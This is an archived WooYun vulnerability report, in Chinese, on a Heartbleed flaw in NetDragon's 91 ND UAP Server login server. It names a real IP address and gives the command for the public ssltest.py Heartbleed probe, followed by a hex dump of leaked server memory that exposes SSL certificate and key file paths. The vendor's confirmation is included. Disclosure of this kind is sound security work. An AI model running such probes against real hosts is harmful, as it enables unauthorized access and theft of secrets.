当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087260

漏洞标题:91 ND UAP Server 用户登陆服务器存在心脏流血漏洞

相关厂商:福建网龙

漏洞作者: 路人甲

提交时间:2014-12-15 17:29

修复时间:2015-01-29 17:30

公开时间:2015-01-29 17:30

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-15: 细节已通知厂商并且等待厂商处理中
2014-12-15: 厂商已经确认,细节仅向厂商公开
2014-12-25: 细节向核心白帽子及相关领域专家公开
2015-01-04: 细节向普通白帽子公开
2015-01-14: 细节向实习白帽子公开
2015-01-29: 细节向公众公开

简要描述:

91 ND UAP Server 用户登陆服务器存在心脏流血漏洞

详细说明:

UAP Server 接口手册 v0.3
http://www.blogjava.net/ebecket/articles/301493.html
按照接口手册验证,确实属于用户接口服务器

https://121.207.242.49/login

漏洞证明:

python.exe ssltest.py 121.207.242.49


0690: 0D 00 61 63 63 65 70 74 2D 72 61 6E 67 65 73 00  ..accept-ranges.
06a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06c0: 00 00 00 00 00 00 00 00 38 28 84 00 00 00 00 00 ........8(......
06d0: 04 00 65 74 61 67 00 00 80 2B 84 00 00 00 00 00 ..etag...+......
06e0: 12 00 78 2D 61 63 63 65 6C 2D 6C 69 6D 69 74 2D ..x-accel-limit-
06f0: 72 61 74 65 00 00 00 00 00 00 00 00 00 00 00 00 rate............
0700: 00 00 00 00 00 00 00 00 60 EA 00 00 00 00 00 00 ........`.......
0710: 60 EA 00 00 00 00 00 00 60 EA 00 00 00 00 00 00 `.......`.......
0720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0730: 00 10 00 00 00 00 00 00 8D 26 42 00 00 00 00 00 .........&B.....
0740: 50 8A E1 1D 00 00 00 00 C0 AA E7 1D 00 00 00 00 P...............
0750: 2F 75 73 72 2F 6C 6F 63 61 6C 2F 6E 67 69 6E 78 /usr/local/nginx
0760: 2F 63 6F 6E 66 2F 2E 2F 73 73 6C 2F 39 31 2E 63 /conf/./ssl/91.c
0770: 6F 6D 2E 73 65 72 76 65 72 2E 32 30 31 33 2E 63 om.server.2013.c
0780: 65 72 00 2F 75 73 72 2F 6C 6F 63 61 6C 2F 6E 67 er./usr/local/ng
0790: 69 6E 78 2F 63 6F 6E 66 2F 2E 2F 73 73 6C 2F 39 inx/conf/./ssl/9
07a0: 31 2E 63 6F 6D 2E 32 30 31 33 2E 6B 65 79 00 00 1.com.2013.key..
07b0: 8D 26 42 00 00 00 00 00 F8 25 E9 1D 00 00 00 00 .&B......%......

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-12-15 17:55

厂商回复:

感谢 路人甲 提供的漏洞,已安排进行修复

最新状态:

暂无